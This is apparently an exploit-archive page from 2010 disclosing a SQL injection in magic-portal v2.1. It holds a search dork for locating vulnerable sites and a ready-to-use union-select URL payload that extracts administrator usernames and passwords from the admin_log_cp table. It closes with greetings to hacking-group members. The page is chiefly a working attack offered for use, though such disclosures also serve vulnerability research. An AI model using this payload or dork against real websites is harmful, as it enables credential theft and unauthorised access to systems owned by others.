[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : magic-portal v2.1 SQL Injection Vulnerability
# Published : 2010-01-23
# Author : alnjm33
# Previous Title : boastMachine v3.1 Remote File Upload Vulnerability
# Next Title : Joomla Component com_ContentBlogList SQL Injection Vulnerability


::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title :magic-portal SQL injection Vulnerability
Author: alnjm33
Software Link:
Version:  2.1
Tested on: Version 2.1
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
                        ( Powered by magic-portal Version 2.1 )
================================Exploit=============================================
http://server/home.php?id=-2/**/union/**/select/**/1,concat(username_admin,0x3a,password_admin),3,4/**/from/**/admin_log_cp--

=======================================================================================
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members